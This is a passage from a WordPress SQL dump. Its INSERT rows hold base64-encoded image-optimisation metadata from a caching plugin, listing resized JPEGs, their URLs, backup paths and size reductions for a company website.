dGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUwNywiaWQiOjMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUwOSwiaWQiOjMyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTExLCJpZCI6MzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wb3VuZGluZ19vaWwtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wb3VuZGluZ19vaWwtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb21wb3VuZGluZ19vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE1MTQsImlkIjozMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNDd4MjU4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNDd4MjU4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjU4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNDd4MjU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUxNiwiaWQiOjMyfV0='); 
INSERT INTO `wp_postmeta` VALUES (30433, 31, 'wpfc_optimisation_reduction', '41055'); 
INSERT INTO `wp_postmeta` VALUES (30434, 31, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29hdGluZ3MuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb2F0aW5ncy5qcGciLCJ3aWR0aCI6MjIwLCJoZWlnaHQiOjE3OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvYXRpbmdzLmpwZyIsInJlZHVjdGlvbiI6NDEwNTIsInRpbWUiOjE0ODM1OTE1MjIsImlkIjoiMzEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvYXRpbmdzLTIwMHgxNzkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNzksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29hdGluZ3MtMjAweDE3OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb2F0aW5ncy0yMDB4MTc5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUyNCwiaWQiOjMxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29hdGluZ3MtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb2F0aW5ncy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvYXRpbmdzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTI2LCJpZCI6MzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb2F0aW5ncy0xODB4MTc5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvYXRpbmdzLTE4MHgxNzkuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxNzkiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29hdGluZ3MtMTgweDE3OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE1MjgsImlkIjozMX1d'); 
INSERT INTO `wp_postmeta` VALUES (30435, 30, 'wpfc_optimisation_reduction', '63139'); 
INSERT INTO `wp_postmeta` VALUES (30436, 30, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLmpwZyIsIndpZHRoIjozNTAsImhlaWdodCI6MjMzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2xlYW5yb29tLmpwZyIsInJlZHVjdGlvbiI6NjMxMzEsInRpbWUiOjE0ODM1OTE1MzUsImlkIjoiMzAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0zNDB4MjMzLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0zNDB4MjMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFucm9vbS0zNDB4MjMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUzOCwiaWQiOjMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yNTB4MjMzLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yNTB4MjMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFucm9vbS0yNTB4MjMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU0MCwiaWQiOjMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFucm9vbS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU0MiwiaWQiOjMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFucm9vbS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU0NCwiaWQiOjMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2xlYW5yb29tLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTQ2LCJpZCI6MzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbnJvb20tMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbnJvb20tMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbnJvb20tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE1NDgsImlkIjozMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yNDd4MjMzLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFucm9vbS0yNDd4MjMzLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjMzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFucm9vbS0yNDd4MjMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU1MSwiaWQiOjMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLTMwMHgyMzMuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5yb29tLTMwMHgyMzMuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyMzMiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2xlYW5yb29tLTMwMHgyMzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTUzLCJpZCI6MzB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30437, 29, 'wpfc_optimisation_reduction', '72919'); 
INSERT INTO `wp_postmeta` VALUES (30438, 29, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbmluZy5qcGciLCJ3aWR0aCI6MjYwLCJoZWlnaHQiOjM3NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFuaW5nLmpwZyIsInJlZHVjdGlvbiI6NzI5MTEsInRpbWUiOjE0ODM1OTE1NjAsImlkIjoiMjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTI2MHgzNDAuanBnIiwid2lkdGgiOjI2MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjYweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbmluZy0yNjB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU2MywiaWQiOjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbmluZy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU2NSwiaWQiOjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbmluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU2NywiaWQiOjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbmluZy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU2OSwiaWQiOjI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbmluZy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFuaW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTcxLCJpZCI6Mjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbmluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2xlYW5pbmctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE1NzMsImlkIjoyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NsZWFuaW5nLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jbGVhbmluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU3NSwiaWQiOjI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2xlYW5pbmctMjYweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jbGVhbmluZy0yNjB4MzAwLmpwZyIsIndpZHRoIjoiMjYwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NsZWFuaW5nLTI2MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTc4LCJpZCI6Mjl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30439, 27, 'wpfc_optimisation_reduction', '52451'); 
INSERT INTO `wp_postmeta` VALUES (30440, 27, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2F0YWxvZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhdGFsb2cuanBnIiwid2lkdGgiOjIyMCwiaGVpZ2h0IjoyMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYXRhbG9nLmpwZyIsInJlZHVjdGlvbiI6NTI0NDgsInRpbWUiOjE0ODM1OTE1ODQsImlkIjoiMjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhdGFsb2ctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYXRhbG9nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9